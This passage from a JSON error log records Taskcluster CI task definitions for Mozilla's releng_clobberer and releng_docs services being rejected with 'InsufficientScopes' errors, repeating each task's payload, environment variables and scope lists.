\\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.952Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.952Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.952Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.099Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"AcKpJjqTQ2aL967W6ECClg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.952Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.952Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.952Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.099Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"AcKpJjqTQ2aL967W6ECClg\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:project/releng/services/master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/project/releng/services/master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"cfa14912f2f079b64808b6fefe18c542ed553135\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:42:59.952Z\",\n                    \"deadline\": \"2016-09-24T11:42:59.952Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T9H_iW7TR6uT5rKXEFcEzw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:42:59.952Z\"\n                },\n                \"time\": \"2016-09-23T11:43:00.099Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:project/releng/services/master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"SSHBeEXMTXCggbQR3UipuQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.950Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.950Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.950Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.103Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"SSHBeEXMTXCggbQR3UipuQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.950Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.950Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.950Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.103Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"SSHBeEXMTXCggbQR3UipuQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:project/releng/services/master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/project/releng/services/master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"cfa14912f2f079b64808b6fefe18c542ed553135\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:42:59.950Z\",\n                    \"deadline\": \"2016-09-24T11:42:59.950Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T9H_iW7TR6uT5rKXEFcEzw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:42:59.950Z\"\n                },\n                \"time\": \"2016-09-23T11:43:00.103Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:project/releng/services/master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UX7MqrppQgKKZSr_08Aspw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.950Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.951Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.951Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.115Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UX7MqrppQgKKZSr_08Aspw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      